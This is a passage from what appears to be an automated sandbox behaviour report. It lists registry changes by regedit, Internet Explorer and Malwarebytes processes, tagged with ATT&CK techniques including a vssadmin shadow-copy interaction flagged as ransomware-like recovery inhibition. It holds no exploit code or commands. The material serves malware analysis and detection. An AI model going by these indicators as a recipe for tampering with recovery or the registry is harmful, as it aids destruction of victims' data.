Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	MBAMService.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

3320 vssadmin.exe

pid	process
3320	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

Processes:

IEXPLORE.EXEregedit.exeiexplore.exeMBAMInstallerService.exeMBAMService.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\IntelliForms	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\Toolbar	regedit.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\Download	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\International\Scripts\13	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\Security	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\International\Scripts\10	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\International\Scripts\32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\International\Scripts\36	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\International\Scripts\38	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\International\Scripts	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\LowRegistry	regedit.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\InternetRegistry	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\ProtocolExecute	regedit.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\International\Scripts\11	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\International\Scripts\18	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	MBAMInstallerService.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\International\Scripts\33	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\mbamtray.exe = "11000"	MBAMService.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\International\Scripts\3	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser	regedit.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1082570216"	iexplore.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\International\Scripts\16	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\International\Scripts\8	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\SearchScopes	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\SQM	regedit.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\Desktop	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\International\Scripts\27	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\International\Scripts\37	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\ProtocolExecute\word	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\Recovery	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31112614"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0e6bf40a6bdda01	iexplore.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\International\Scripts\15	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\Main	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\New Windows	regedit.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\Desktop\General	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\International\Scripts\6	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\URLSearchHooks	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31112614"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\International\Scripts\17	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\Services	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\Setup	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\User Preferences	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\International\Scripts\35	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\International	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	regedit.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

DrvInst.exeLogonUI.exeMBAMInstallerService.exeMBAMService.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	DrvInst.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Policies\Microsoft\Office\16.0	MBAMInstallerService.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols	MBAMInstallerService.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications\malwarebytes:	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	DrvInst.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\16.0\Common	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	DrvInst.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\15.0	MBAMInstallerService.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft	MBAMInstallerService.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\Office\15.0\Common\Security	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	MBAMInstallerService.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Malwarebytes\FirstRun = "false"	MBAMInstallerService.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols\All Applications\malwarebytes:	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\15.0\Common\Security	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications	MBAMInstallerService.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications\malwarebytes:\	MBAMInstallerService.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols\All Applications\malwarebytes:\	MBAMInstallerService.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	DrvInst.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	MBAMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	MBAMInstallerService.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Policies\Microsoft\Office\15.0	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\16.0\Common\Security	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	MBAMService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	MBAMInstallerService.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Malwarebytes	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\Office\15.0	MBAMInstallerService.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\Office\15.0\Common	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols\All Applications	MBAMInstallerService.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	MBAMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	MBAMInstallerService.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Malwarebytes\FirstRun = "false"	MBAMInstallerService.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Policies\Microsoft\Office\16.0\Common\Security	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Policies	MBAMInstallerService.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications\malwarebytes:	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Policies\Microsoft	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	DrvInst.exe

Modifies registry class 64 IoCs

Processes:

MBAMService.exeregedit.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6B3DFEA6-6514-42CF-A091-C4DFFD9C2158}\ = "IScanControllerEventsV13"	MBAMService.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0072-ABCDEFFEDCBC}	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CC4D9C86-78F2-435F-8355-5328509E04F1}\TypeLib	MBAMService.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0155-ABCDEFFEDCBA}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0135-ABCDEFFEDCBC}	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Extensions\ContractId\Windows.BackgroundTasks\PackageId\Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy\ActivatableClassId\CortanaUI.AppXp4159809fzs639aejme5j84khknw	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Extensions\ContractId\Windows.FileOpenPicker	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F3968E6D-3FD5-4707-A5A8-4E8C3C042062}	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F6A99D88-2CA0-4781-86B9-2014CDC372E8}	MBAMService.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0013-0001-0077-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0014-0002-0045-ABCDEFFEDCBA}	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\FileSyncClient.AutoPlayHandler\CurVer	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\WOW6432Node\Interface\{AF60000F-661D-472A-9588-F062F6DB7A0E}\TypeLib	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9B1790AB-65B0-4F50-812F-7CC86FA94AF7}\ProxyStubClsid32	MBAMService.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0255-ABCDEFFEDCBC}	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0173-ABCDEFFEDCBA}\InprocServer32	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6357A98F-CE03-4C67-9410-00907FB21BC7}\TypeLib	MBAMService.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0221-ABCDEFFEDCBB}	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Extensions\ContractId\Windows.BackgroundTasks\PackageId\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivatableClassId\App.AppX4ghv22m4dc0qd17z7sbzqr79egfp5w6j.mca	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{99E6F3FE-333C-462C-8C39-BC27DCA4A80E}\ProxyStubClsid32	MBAMService.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0146-ABCDEFFEDCBA}\InprocServer32	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7968A0D1-5C9E-4F28-8C2F-E215BC7DF146}\TypeLib\Version = "1.0"	MBAMService.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0082-ABCDEFFEDCBC}	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0097-ABCDEFFEDCBC}	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Extensions\ContractId\Windows.PreInstalledConfigTask\PackageId\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivatableClassId	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3968399C-D098-40AF-9700-734B46FF03C9}	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B9F73DD6-F2A4-40F8-9109-67F6BB8D3704}\ProxyStubClsid32	MBAMService.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EDF63EDA-B622-44E2-8053-8877E33BB49A}\TypeLib\Version = "1.0"	MBAMService.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Extensions\ContractId\Windows.Launch\PackageId\Microsoft.Windows.Apprep.ChxApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivatableClassId\App	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{72F290D5-789C-4D8A-9EBE-63ECEA150373}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{19B9825A-26E8-468B-BD9F-3034509098F0}\TypeLib	MBAMService.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0072-ABCDEFFEDCBB}	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0023-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0274-ABCDEFFEDCBC}	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0334-ABCDEFFEDCBB}	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0381-ABCDEFFEDCBB}	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2DEBAD4E-3BAF-44F0-9150-BCCCC3801CF9}\ProxyStubClsid32	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6A3E14F0-01F5-492E-AA97-3D880941D814}\TypeLib	MBAMService.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0091-ABCDEFFEDCBB}	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0225-ABCDEFFEDCBA}	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9BFD0661-4D6A-4607-8450-2EF79859A415}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	MBAMService.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0286-ABCDEFFEDCBB}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0297-ABCDEFFEDCBC}	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0086-ABCDEFFEDCBA}\InprocServer32	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MB.AEController	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E298372C-5B10-42B4-B44C-7B85EA0722A3}	MBAMService.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0026-ABCDEFFEDCBB}	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\SplashScreen\Microsoft.Windows.SecondaryTileExperi	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{34544A67-823A-484D-8E18-371AFEAEC02E}	MBAMService.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0079-ABCDEFFEDCBC}	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0315-ABCDEFFEDCBC}\InprocServer32	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0377-ABCDEFFEDCBC}\InprocServer32	regedit.exe
